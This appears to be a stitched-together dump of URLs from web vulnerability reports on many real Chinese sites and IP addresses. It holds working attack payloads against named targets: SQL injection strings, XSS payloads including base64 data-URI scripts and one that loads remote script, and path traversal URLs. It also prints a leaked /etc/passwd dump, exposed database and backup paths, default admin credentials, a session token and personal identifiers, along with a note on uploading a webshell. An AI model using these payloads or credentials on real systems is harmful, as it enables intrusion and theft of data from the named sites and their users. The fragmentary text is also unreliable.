http://tv.sohu.com/20131020/n388535118.shtml# data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== http://www.ahtlxgt.gov.cn/admin/ http://www.cae.com.cn/webFunction/webpagenews.aspx?nid=1f2d56a1703d487ebbdebab3c0b912f4 http://franchising.mcdonalds.com.cn/cn/faq.aspx?cid=5 http://www.vapee.com/new_vapee/index.php?d=anonymity&c=gbook_c_recep&m=index&z_cate=1&class=1 http://cartoon.jm.gd.vnet.cn/ http://game.funshion.com http://game.funshion.com:80/ http://www.tuanxila.com/pro-cate.html?keyword=m1x7e1 http://pandavip.www.net.cn/cgi-bin/query_second?price1=0&price2=0&tld_type=&com_type=&length1=0&length2=0&key_name=m1x7e1 http://yangtian.wm-it.com/test/ username:admin password:123456 http://it.homeinns.com/ito_beta/Main/main.aspx http://it.homeinns.com/ito_beta/Event/UserInfo.aspx http://pim.lenovo.com/ http://pim.lenovo.com/contact/contact/portal/query/contact/contactId/7?t=1382111729847 http://mail.nbzj.gov.cn/ http://ggfw.jshrss.gov.cn/PostDoctoral/external/comIndex.action?id=C000006 http://edu.91.com/bbs/robots.txt/a.php http://bbs.91up.com/robots.txt/a.php 
http://bbs.conquista.91.com/clientscript/vbulletin_important.css/a.php http://mjoy.91.com/imgs/css/css.css/a.php http://tieba.baidu.com/home/main?un=%E5%AE%89%E8%BF%AA%E5%93%A5%E5%93%A5%E6%97%A0%E6%95%8C%E5%B8%85&fr=pb URL:http://tieba.baidu.com/home/post/follow ie:utf-8 tbs:1190f2082bac96ec1382418842 http://www.tophr.net/InterView/news.asp?id=215 http://121.207.254.4/myadmin/index.php?lang=en-iso-8859-1&server=1 http://so.91.com/resin-doc/tutorial/jndi-appconfig/test?inputFile=file:////etc/sysconfig/network-scripts/ifcfg-eth0 file:////etc/sysconfig/network-scripts/ifcfg-eth0 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin ais:x:39:39:openais Framework:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false vcsa:x:69:69:virtual owner:/dev:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin fax:x:78:78:mgetty user:/var/spool/fax:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin cyrus:x:76:12:Cyrus Server:/var/lib/imap:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash 
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin radiusd:x:95:95:radiusd user:/:/bin/false exim:x:93:93::/var/spool/exim:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pvm:x:24:24::/usr/share/pvm3:/bin/bash mailman:x:41:41:GNU Manager:/usr/lib/mailman:/sbin/nologin quagga:x:92:92:Quagga suite:/var/run/quagga:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin privoxy:x:73:73::/etc/privoxy:/sbin/nologin radvd:x:75:75:radvd user:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin ident:x:98:98::/home/ident:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin tomcat:x:91:91:Tomcat:/usr/share/tomcat5:/bin/sh xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin jf91:x:500:500::/home/httpd/html/:/sbin/nologin wlin:x:501:501::/home/httpd/html/test:/sbin/nologin mongodb:x:20001:20001::/home/mongodb:/bin/bash sody:x:20002:20002::/home/httpd/html/so.dy.com.cn:/bin/bash so91:x:20003:20003::/home/httpd/html/so.91.com:/sbin/nologin www.iotmoe.cn www.iotr.org.cn www.iotedu.com.cn www.nrit.cn www.zgyjw.org.cn www.ccit.org.cn http://www.ccit.org.cn/eWebwanEditorbo/admin/ www.btvb.tv http://btvb.tv/eWebwanEditorbo/admin/ http://trips.feihang.cn/tripslist.aspx?id=5 http://trips.feihang.cn/trips.aspx?id=248 http://hotel.feihang.cn/hotellist.aspx?cID=363 http://hotel.feihang.cn/hotellist.aspx?ID=82 http://hotel.feihang.cn/HotelOrder.aspx?ID=286 http://hotel.feihang.cn/HotelOrder.aspx?ID=286&MID=181 
http://trips.feihang.cn/tripslist.aspx?id=5 http://trips.feihang.cn/tripslist.aspx?id=5 http://trips.feihang.cn/tripslist.aspx?id=5 www.zsmyy.com/plus/Ajaxs.asp?action=GetRelativeItem&Key=123%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563%2574%25201,2,username%252B%2527%257C%2527%252Bpassword%20from%20KS_Admin%2500 http://c.tieba.baidu.com//c/s/sync?msg_status=1&net_type=3&ka=open&_phone_imei=E7F9E1BD6557D6D1F4EC1365A3FA2F77&manager_model=0&_timestamp=1382417734256&BDUSS=1p2dkUtRUR4enNFQ2pBUnoyRHZPNGlWNlNjRW5FTTcwbk9rRnlHRzF2OUxiNHRTQVFBQUFBJCQAAAAAAAAAAAEAAAAT~JQ5usPJ2cTqueLDosvEyeQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEviY1JL4mNSM|f4a94c2b213eb3b68362a95c708d98f5&_client_version=4.5.33277d%3Cimg%20src%3da%20onerror%3dalert%28%2708sec%27%29%3E034ecb35ff8138911&_phone_newimei=E7F9E1BD6557D6D1F4EC1365A3FA2F77&_phone_screen=640%2C960&from=appstore&_client_type=1&_client_id=wappc_1382283759950_558&_os_version=7.0.2&cuid=E7F9E1BD6557D6D1F4EC1365A3FA2F77&sign=5FE0C1D66999A8D9FE6FBC54572D0C28 http://www.qinglanji.com/index.php?app=group&ac=topic&ts=delete&id=885&userid=295262 http://tieba.baidu.com/pmc/bawu http://25555555.com/menpiao/menpiao/MenPiaoYuDing.aspx?MID=116 http://25555555.com/menpiao/menpiao/MenPiaoYuDing.aspx?MID=116 http://25555555.com/menpiao/menpiao/MenPiaoYuDing.aspx?MID=116 http://25555555.com/menpiao/menpiao/MenPiaoYuDing.aspx?MID=116 http://www.qy6.com/common/feedback.php http://xzxk.justice.gov.cn/application/stateList.action?appType=XZXK4_APP_TYPE_5 http://222.77.183.235/video/ user:fzadmin password:123456 http://222.77.183.235/video/ http://blog.mingdao.com/ www.oxford.com.cn www.zhongjianye.com博主 www.weibo.com/blhe http://love.51kuban.com/index.php/default/index http://houtai.kuai8.com/emb/find_psw.php http://yzddpk.jstv.com/qdgl/ http://xxxx http://member.china-pub.com/member/mypub/account_infrom.aspx http://221.181.12.4/mainFrame.rw http://bbs.douwan.cn/robots.txt/1.php 
http://bbs.cmge.com/test.html。 http://blog.sohu.com/manage/entry.do http://202.108.211.92/home/abstract/index https://st.ettoday.net/shop/shop-category.php?shop=45-175 http://waibao.sogou-inc.com/import.jsp http://waibao.sogou-inc.com/DownloadAction http://training.soufun.com/course/course.aspx?lid=-1 view-source:http://hms.qunar.com/admin/directsell/hotelimage/index.htm?navid=123456 data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4= https://bb.tower.im/users/sign_in http://121.14.4.186/views/mail/script/mail.jsp http://59.57.250.58:8090/ http://122.227.140.114/ http://211.152.60.227:8011/API/getresv.aspx?service=get_resv_info&partner=ben4a8ysd&orderid=130512021002010 http://www.fjhi.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector http://www.fjhi.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFolders&Type=Media&CurrentFolder=/ http://www.fjhi.gov.cn/zb http://www.fjhi.gov.cn/zxpx/ http://www.tjjnwsjds.com/manage/manage_login.action http://www.ewebtd.com/ http://211.138.112.80:8080/dbs/DisplayServlet?ftable=software&lid=130500%2b1 http://x.xdf.cn/home.php?mod=spacecp&ac=friend&op=find data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4= URL:www.mz10010.com filetype:xls http://202.99.63.185:8081/YearBook http://ts02.12634.com/Home/Login http://m.anquanbao.com/a.php http://m.anquanbao.com/m.php http://blog.jiankongbao.com/wp-login.php http://www.whepb.gov.cn/install/ https://pr.sohu-inc.com/.svn/entries http://gz12315.com.cn/reg.do?method=getUser1&FUserCode=%20WLOVEDYN http://www.letvcloud.com/api/sdkdownload?c=php&v=1.2 http://mail.ahedu.gov.cn/login.php https://www.baifubao.com/easypay/0/sendsms/0?phone_number=手机号&sub_bank_code=3002&card_no=6222222222222222&token=5be5f3114b577cd09e1feda4d2ed80fd&card_type=1&contract_flag=0&true_name=xxx&identity_type=1&identity_code=500233199003120049&bind_flag=0&time=1382504056467 http://wooyun.org/bugs/wooyun-2010-037941 
http://faq.xiaomi.cn/?user/ask/1.html http://rg.shenzhenair.com/webadmin.nsf http://www.snciq.gov.cn:6198/car/login.action http://um.mama.cn/connect.php?action=view&do=persondetail http://www.duokan.com http://satonline.cn/ http://xincheng.sh.soufun.com/7-8-1.asp?id=568 http://xincheng.sh.soufun.com/media.asp?id=537 http://pdfsprint.foxitsoftware.cn/data_tree/file.php?id=201204201640564f91211850002&page=1 http://pdfprint.foxitsoftware.cn/template.php?Page=1&horizontal=1&cid=&type=1&searchtext=1 http://www.foxitsoftware.cn/info.php http://blog.xiachufang.com/ http://serviceshop.lenovo com.cn/WebAjaxHelper.ashx?commentsno=ab637223-3828-473c-a2be-058e346ec925&sysun= http://www.4008123223.cn/user_order_detail.php?id=15930 http://video.mofcom.gov.cn/admina/ http://pdfprint.foxitsoftware.cn:80/data_tree/file.php?id=201203161120424f62b18a995b7 http://dellcity.dell-brand.com/server-info www.hrsoft.com.cn http://m.soufun.com/bbs/ http://www.dpac.gov.cn/www.zip http://www.dpac.gov.cn/www.zip http://eml.sohu.net/.svn/entries http://eml.sohu.net/system/out/.svn/entries http://edm.sohu.net/.svn/entries http://edm.sohu.net/system/out/.svn/entries www.yupoo.com http://blog.yupoo.com/wp-login.php http://125.35.5.78:1000/ http://125.35.5.78:1000/test.aspx http://ucenter.51cto.com/login.php?reback=http://wooyun.org http://www.cioage.com http://bbs.51cto.com http://blog.51cto.com http://selftest.51cto.com http://doctor.51cto.com http://home.51cto.com http://t.51cto.com http://down.51cto.com http://job.51cto.com http://www.beingmate.com/bym2013/index.php/love/detail?id=15922 http://www.aimabz.com/marry/admincp.php?action=login http://xss.tw/4029 url:http://my.xizi.com/index.php?r=message/ajaxadddata&callback=jQuery17203734854192007333_1382543581696&tousername=收信的ID&content=信息内容&_=1382543598882 http://mga.people.com.cn/siteserver/login.aspx http://acjstb.aliyun.com/actionlog/flash/JSocket.swf这个文件。 http://www.tongdao.gov.cn/mlds_manage/hdjlIndex!hdjlIndex.action 
http://dellcity.dell-brand.com/admin/login.php http://www.bestay.com.cn/Web/Reservation/Select.aspx?Time=1&key=%27and%20user%3E0-- http://211.151.230.34/ http://211.151.230.34:80/ google:inurl:changLang.action www.avms.com.cn:8080/changLang.action www.hxjshy.com:8080/changLang.action http://mobile.tudou.com/# http://dagl.haidilao.com/thamsxp/index.htm http://dagl.haidilao.com/jmx-console/ http://dagl.haidilao.com/a/pwn.jsp?cmd= http://dagl.haidilao.com/thamsxp/install/ url:http://bbs.xizi.com/pw_ajax.php?action=banpost&uid=被禁言ID&callback=jQuery172046430486836470664_1382589403612&step=2&username=被禁言用户名&atc_content=&gid=-1&interface=被禁言天数&_=1382589424428 http://www.tyyb.gov.cn/login/loginAction.do http://sns1.prod.elong.com/hotel/weibolist.php http://sns1.prod.elong.com/hotel/ http://sns1.prod.elong.com/php.php http://www.mingdao.com/home http://app.hanzhong.gov.cn:8080/question/front/questionList.do?typecode=szxx http://www.socl.net/view/jobs/apply.action?jobId=%22%3E%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E http://jyxx.ah.sgcc.com.cn http://123.103.63.241:80/ http://123.103.63.241/ett20/study/usermanage/studentregister1action.jsp http://www.yc-zx.gov.cn/admin/Review.asp?work=type&id=198 http://gm.punchbox.org/feedback.php http://apply.gzgov.gov.cn:81/question/front/questionList.do?typecode=ldxx存在越权 http://app.hanzhong.gov.cn:8080/question/front/showQuestion.do?questionId=85062&typecode=szxx http://gzsvr.lss.gov.cn/question/front/showQuestion.do?questionId=59277&typecode=shjdQN http://app.hanzhong.gov.cn:8080/question/front/showQuestion.do?questionId=85062&typecode=szxx http://gzsvr.lss.gov.cn/question/front/questionList.do?typecode=zxfwQN https://www.ename.net/user/findpassword www.ename.net https://www.ename.net http://travel.elong.com/weblog http://travel.elong.com/log http://demo.zoomla.cn/mis/target/page.aspx http://cloud.ecare365.com/admin/Index.htm http://221.131.216.23:8001/zsr/login.action http://s.hujiang.com/topic/56069/p2/###) 
data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3hzcy5nZC9kMXJ1T3k/MTM4MjYwODE3MT48L3NjcmlwdD4g http://www.86gw.com/hqgs.htm http://www.86gw.com/marry/set_memberstore.php?uname=xshq http://www.aimabz.com/marry/admincp.php?action=login http://www.86gw.com/marry/admincp.php?action=delcoupon&storeid=179 http://www.86gw.com/marry/admincp.php?action=delcoupon&storeid= http://www.aimabz.com/marry/set_index.php?action=set_memberstore&sid=1 http://www.cocochong.com/ajax/ajax.aspx?str=1&type=getart2 http://www.bdhhb.gov.cn/database/PowerEasy2006.mdb http://www.bdhhb.gov.cn/temp/PE_TemplateProject.mdb http://www.bdhhb.gov.cn/Admin/maillist.mdb http://www.glaic.gov.cn/admin/maillist.mdb http://www.glaic.gov.cn/temp/PE_TemplateProject.mdb http://www.pdssjj.gov.cn/Database/SiteWeaver.mdb http://www.pdssjj.gov.cn/Admin/maillist.mdb http://www.snjy.gov.cn/database/SiteWeaver6.5.mdb http://www.snjy.gov.cn/temp/PE_TemplateProject.mdb http://www.snjy.gov.cn/Admin/maillist.mdb http://www.staj.gov.cn/admin/maillist.mdb http://www.staj.gov.cn/database/SiteWeaver6.5.mdb http://www.staj.gov.cn/temp/PE_TemplateProject.mdb http://www.wsj.yc.gov.cn/admin/maillist.mdb http://www.wsj.yc.gov.cn/temp/PE_TemplateProject.mdb http://www.wzrlj.gov.cn/admin/maillist.mdb http://www.wzrlj.gov.cn/temp/PE_TemplateProject.mdb http://www.xclh.gov.cn/admin/maillist.mdb http://www.xclh.gov.cn/Database/SiteWeaver.mdb http://www.ydsfj.gov.cn/admin/maillist.mdb http://www.ydsfj.gov.cn/Database/SiteWeaver.mdb http://www.ydsfj.gov.cn/temp/PE_TemplateProject.mdb http://www.yzrk.gov.cn/admin/maillist.mdb http://www.yzrk.gov.cn/Database/SiteWeaver.mdb http://www.yzrk.gov.cn/temp/PE_TemplateProject.mdb http://www.zkpf.gov.cn/admin/maillist.mdb http://www.zkpf.gov.cn/Database/SiteWeaver.mdb http://www.zkpf.gov.cn/temp/PE_TemplateProject.mdb http://www.bh.gov.cn/website.rar http://www.hljboli.gov.cn/mome.asp?id=217 http://www.dajie.com/corp/3936856/joinus http://www.wjxzsp.gov.cn/wjxzfw/ZXJS/admin.aspx?zxjj=1 
http://vip.cnhqt.com/portal/product!index.action http://wed.27.cn/marry/set_index.php?action=set_memberstore&sid=160 http://www.elong.com/promotion/web/elongiphone/index.html http://member.aili.com/note_/note-3492 http://product.aili.com/caches/caches_yp/caches_data/watchjson.cache.php?callback=jsonp138262704199x%3Cimg%20src=x%20onerror=alert%28document.cookie%29%3E8 http://uc.wasu.cn/member/index.php/1806972,弹框: http://mini.10010.com/WEB-INF_20130926.tar.gz http://www.jxcb.gov.cn/bao.asp http://beelab.cau.edu.cn/beelab/ http://whnari.sgepri.sgcc.com.cn/right.jsp?pageNo=1&pageCount=2&productType=O0027&p=88952634&title=88952634 http://www.zbzfcg.gov.cn/funonews.ASP?ID=10690 http://www.zbzfcg.gov.cn/admin/admin.asp http://www.gzmama.com,发现注册的账号仍然能使用。 http://www.gzmama.com log:bogonu@192.168.0.34:gz_dzx_post https://cms.pg.com.cn/ http://pgcms.cyberway.cn/ http://www.nanxian.gov.cn/zfxxgk/news_article.asp?id=1528 http://www.nanxian.gov.cn/admin/admin_login.asp http://www.cofcorice.com/admin/ http://3g.peihua.cn/dcpc/login.action http://www.153.cn/indexDo.do http://ent.appchina.com/market/pcsuite/edit.action http://web.huangshan.gov.cn/JA005/bbsDet.aspx?MsgId=20110729101116843311 http://web.huangshan.gov.cn/JA015/Home/Zwgk_List.aspx?typeid=0502&colid=0500 http://jyzx.fj.sgcc.com.cn/iacd/Main.do http://www.sbd.sc.sgcc.com.cn:8088/unzip.php http://www.sgit.sgcc.com.cn/statistics/pma/error.php http://210.73.81.145/ http://210.73.81.145/downfile.php?dir=index&file=../../../../../../../etc/passwd http://210.73.81.145/aml/index.php http://wxpsock.csair.com/logon.html;jsessionid=13zn9c60u2mlny0w73yjv7k1y?param=test http://12580jx.cn/ http://www.autochina360.com/weibo/admin.php?account=3 www.cofco-property.cn/web.config.bak http://open.yuedu.baidu.com/login http://top.159.com/top.aspx?Field=3&keyword= http://top.159.com/top.aspx?Field=3&keyword= http://top.159.com/top.aspx?Field=3&keyword= http://top.159.com/top.aspx?Field=3&keyword= http://www.gyfg.gov.cn/index.aspx 
http://www.gyfg.gov.cn/jzxx/admin.asp?xgid=3013 http://bidding.ln.sgcc.com.cn/dynamic_page.jsp?CODE=BM_PROJECT_DETAIL_COPY&projectID=210000000000007167&SHOWTYPE_M0=modify http://b2bindia.lenovocrm.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html# http://india.lenovocrm.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html http://www.pwpic.com/wmfilm/submit!list.action http://union.appchina.com/ qq.com/xiaojin http://bbs.appchina.com/test.php http://bbs.appchina.com/phpinfo.php http://wap.139hz.com/comm/manage/login.action http://tuan.aili.com/account/setaddress.php http://www.ceppbooks.sgcc.com.cn/Product2.aspx?p=ZT10000002&id=97875123200029000010 http://breadtrip.com/trips/旅程的ID,可以在URL处查找/delete/ http://breadtrip.com/trips/2387707905/bookmark/ http://breadtrip.com/accounts/logout/ http://www.ename.net http://www.fjjtzj.cn/message!viewMessage.action http://www.fjjtzj.cn/css2.jsp http://www.zjlt.cn/ http://www.iunionet.com/ http://952111.com/ http://b2b.beingmate.com/PubAction.action http://b2b.beingmate.com/loginAction.action http://b2b.beingmate.com/download2.action http://club.beingmate.com/mmKnow/index.jsp http://analytics.tomonline-inc.com/ http://analytics.tomonline-inc.com/phpmyadmin http://analytics.tomonline-inc.com/doc/ http://www.dajie.com/account/feedback http://material.letv.com/material.tar.gz http://www.csrc.gov.cn/pub/newsite/zxbs/ http://202.106.183.121:8080/csrcfund/login!log.action http://demo.acsoft.com.cn/default.aspx http://demo.acsoft.com.cn/user/AdminModifyPwd.aspx http://mfc.siyuanren.com/cms/ http://xueyuan.baihe.com/ http://www.teachina.com/admin/Default.aspx http://www.dyrc114.com/news/topiclist.asp?topicid=7 site:wygk.cn” http://qywz+数字+.wygk.cn/admin/Login.asp http://www.516itravel.com/深航旅游网 http://ui.letv.com/ http://219.143.252.178/ http://ask.huatu.com/ http://ask.huatu.com/gwy/79460.html 
http://2009.jxrd.gov.cn/jxrd_old/news/show/showrdlist.asp?KindName=%D0%C2%CE%C5%DC%F6%DD%CD&NewsLevel=5&NewsLine=5&NewsStyle=100110&NewsTextFont=9&newslength=80 http://www.gse.pku.edu.cn/jchjy/admin/data/data.mdb http://506pingjia.cofco.com:8080/IR/noticeDetail.jsp?ID=80 http://www.bjrcw.com/link/admin.asp www.8264.com)任意用户密码重置漏洞的形成是由于该网站采用了用户权限集成功能(例:UC-Center)类似于一个通行证方式对用户权限进行验证,只要任意采用该方式验证的站点受到威胁,即可对所有站点的用户信息构成威胁,因此在这种架构中要格外注意各平台安全。 http://t.caijing.com.cn/cjapi/iframe?act=biaoqian&id=663&uid=13 http://fxb.csair.com/a320/p/index.php?logout http://fxb.csair.com/a320/quiz/?u=err http://219.143.252.74/ https://mail.jd.com/owa/auth/logon.aspx http://exchangespigot.codeplex.com/ http://219.134.93.154:8080 rsync://zhangchao@mail.lingyuwangluo.com:8010 http://pdfprint.foxitsoftware.cn/calendarpreview.php?id= http://travel.haier.com/Travel/Hotel/SPHotelInfo/ReLogin.aspx http://506srm.cofco.com/custom/ http://506srm.cofco.com/count/StatDay.asp?QDay=2006-1-undefined1%3CScRiPt%20%3Ealert%281%29%3C/ScRiPt%3E http://506srm.cofco.com/custom/getnewspagedata.aspx?buyGroupId=&child=true&GroupId=142&keyword=&p=&pagetype=GroupNewsList&companyId=1 http://www.teamhd.net(上海腾翼多媒体)是一家专注广告机的公司,旗下IPUB联网数字标牌管理系统4.x系列都存在struts2漏洞。其主站上标示的演示地址同样存在漏洞。详细见证明。 http://blog.tiantianbrowser.com/phpmyadmin/ http://www.zteict.com/newsdetail.aspx?id=299 http://www.zteict.com/admin/login.aspx data:text/html;base64,PHNjcmlwdD5hbGVydCgid29veXVufnRlc3QiKTwvc2NyaXB0Pg== http://219.143.252.160/ http://219.143.252.160/about/award.aspx?pro_id=1 http://www.luyuan.cn/ http://www.luyuan.cn/admin/login.php http://www.luyuan.cn/Data/ http://www.luyuan.cn/Data/sqlbackup/oecms_0518_6e326cnzf1_1.sql http://www.cofco-trust.com http://www.cofco-trust.com:8080/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../ROOT/ http://www.cofco-trust.com:8080/upload/upload.jsp http://219.143.252.153/ http://219.143.252.185/ 
http://219.143.252.185/service/productinfo.php?pid=660 http://219.143.252.185/service/productinfo.php?pid=660 http://219.143.252.185/service/productinfo.php?pid=660%E2%80%98 http://61.154.9.17/ http://219.143.252.185:8000/ http://www.zzzydj.gov.cn/admin/xinxi/upload/images/ http://www.zzzydj.gov.cn/admin/xinxi/upload/new_upload.asp http://www.hyws.gov.cn/bszn/class/1ndex.php http://api.easyon.cn:8080/easyon_localinfo/mail.action http://219.143.252.186/ http://116.228.171.23:8080/ http://www.dsgame.cc/shelf/productType.action?parentId=103 http://gss.hisense.com/jmx-console/ http://www.exploit-db.com/exploits/28713/,这是测试poc,仅用于安全测试用哈~~~ www.eol.cn www.eol.cn-2 encap:Ethernet C0:9F:38:C1:95 addr:211.151.91.98 Bcast:211.151.91.111 Mask:255.255.255.240 MTU:1500 packets:1915675700 dropped:144 packets:3921889199 txqueuelen:1000 http://www.chongxin.gansu.gov.cn/wmx/ http://122.226.134.147:8080/customize/nwc_user_enterprise/login/login.html password:123456 password:123456 http://www.dsgame.cc/shelf/productInfo.action?productCode=00001003011741 http://www.xngjj.gov.cn/console/actions/mbean/MBeanFramesetAction?bodyFrameId=wl_console_frame_1382658290056&isNew=false&frameId=wl_console_frame_1382658290057&sidebarFrameId=wl_console_frame_1382658290058&MBean=mydomain%3AName%3Dmydomain%2CType%3DDomain http://www.shenzhoupiaowu.com/cooperate.do?keyword= http://www.52cs.com.cn/answer.action http://www.114mall.com.cn/exchangecenter/CommodityList.aspx?commTypeID=17 http://www.114mall.cn/cms/ http://app.alipay-inc.com/ http://www.zj114.net.cn/admin/login.do http://passport.zte.com.cn/editorial/ztecn/ch/index.aspx http://passport.zte.com.cn/editorial/ztecn/ch/author/query_article_status.aspx?psu=864DDE32A7279CC0928FC8E806A4D37D http://passport.zte.com.cn/editorial/ztecn/ch/author/modify_article_author.aspx?file_no=200811240000001&author_name=%D7%A8%CC%E2%CD%B6%B8%E5&journal_id=ztecn&psu=864DDE32A7279CC0928FC8E806A4D37D 
http://passport.zte.com.cn/editorial/ztecn/ch/author/modify_article.aspx?id=201310110000001&flag=0&psu=864DDE32A7279CC0928FC8E806A4D37D&journal_id=ztecn http://www.zte-i.com/admin/ http://www.aoratec.com/queryAllJobs.action http://211.162.125.104/ http://shehui.hc360.com/blog-8734565-1173519.html http://61.50.254.40/thqm/index.action http://61.50.254.63/collectlistByMsisdn.action URL:http://www.qinglanji.com http://hz.mnews.com.cn/mobilenews/loginAction.action http://www.elinkhost.com//plugins/newalipay/ PHPINFO:http://www.elinkhost.com/php.php http://211.140.2.120:8080/logAudit/system/login_createValidateImg.action http://www.decfc.dongfang.com http://www.vmovier.com/album/?aid=54 party.vmovier.com/5yue_intro?t=news&ts=video&id=1 wap.vmovier.com/index.php?id=34587 http://g.yruan.com/env.php http://lis.dongfang.com/logistics/start.do http://192.168.1.1/images/1.gif http://tcdrp.gb246.com/ http://sqlmap.org http://agorabis.travelsky.com/airpt/login.action http://zhaopin.ceair.com http://stockdata.stock.hexun.com//dzjy/outdata/hyfb.ashx?addby=30&callback=hxbase_json13829333644881&count=50&page=1&plate=1&type=8&date=2013-10-25 http://www.luolong.gov.cn/www.rar http://www.dongfang.com.cn http://www.dongfang.com.cn/index.php/searches/index/?searchValue=1% http://www.dongfang.com.cn/index.php/searches/index/?searchValue=1% analytics.gexing.com/config/dbconf.php http://a.dodonew.com/dodonew/front/duserCenter/regist1.jsp?dodoId=100036473499 http://www.xkb.com.au/robots.txt http://login.foresound.net/ http://www.likeface.com/likeface.rar http://hljgswsbs.gov.cn:7001/console/ http://hechun.pba.cn/research.php?rid=1 http://www.81688800.com/,用/inc/conn.asp爆出后台,登录后利用抓包,NC可上传小马,爆出路径/upload/anlisz_oneclass/...asp。见图,然后获得webshell,旗下的站列举: http://www.ytmy168.cn/ http://www.tyhtkj.com/此站域名已被劫持! 
http://www.jlztjt.com/land/ http://www.jlztjt.com/rice/ http://www.hwjltgyy.com/ http://i-expenses.neusoft.com/netFinance/login.do?method=begin http://i-expenses.neusoft.com/netFinance/netFinance/signfile/ http://www.zh-hr.com:80/jsp/person/ckzw/position-info.jsp?position=331483用sqlmap能看到信息 http://www.zjmc.tv/index.do http://www.zte-e.com/manage/adminlogin.aspx http://cn.club.vmall.com/ http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://91baby.mama.cn http://www.longmanenglish.cn/LEI/learner/post.do?operation=openPostReport&postID=179这是论坛的举报帖子时可以想客服反馈的意见。同样存在xss。也同样成功获取cookies。和上面的不是同一个人,但是ip相同,可见你们是处在一个内网^^。两处都能登陆后台, http://www.ubox.cn http://dellcity.dell-brand.com/admin/login.php http://sale.jd.com/act/VCmd4BsWhaF.html http://59.46.220.76/jeecms/ http://59.46.220.76/common/.svn/text-base/page_macro.ftl.svn-base http://59.46.220.76/common/.svn/entries http://demo.zoomla.cn/User/Pages/ViewSmallPub.aspx?Pubid=3&ID=1 http://brandbase.mama.cn/robots.txt/a.php http://www.shantoumama.com/robots.txt/a.php http://91baby.mama.cn/robots.txt/a.php http://stockdata.stock.hexun.com/2008en/zcfz.aspx?adate=2012.12.31&stockid=000001&type=0 http://stockdata.stock.hexun.com/2008en/xjll.aspx?adate=2012.12.31&stockid=000001&type=0 http://stockdata.stock.hexun.com/2008en/lr.aspx?adate=2012.12.31&stockid=600643&type=0 http://stockdata.stock.hexun.com/2008en/cwbl.aspx?adate=2012.12.31&stockid=000001&type=0 http://stockdata.stock.hexun.com/2008en/zcfz.aspx?adate=2012.12.31&stockid=000001&type=0 http://58.252.3.20/ http://58.252.3.20/Default.aspx http://58.252.3.20/function/main.aspx http://www.xiangcheng.gov.cn/jgsz/sp/adminlogin.php http://www.wanhu.com.cn/ inurl:jsp http://www.ahdx.gov.cn/c:/ http://www.chinafoma.com/c:/ http://www.csagency.com.cn/c:/ http://www.ahsft.gov.cn/c:/ http://www.ahjgxy.com/c:/ http://www.hfol.com.cn:8080/c:/ 
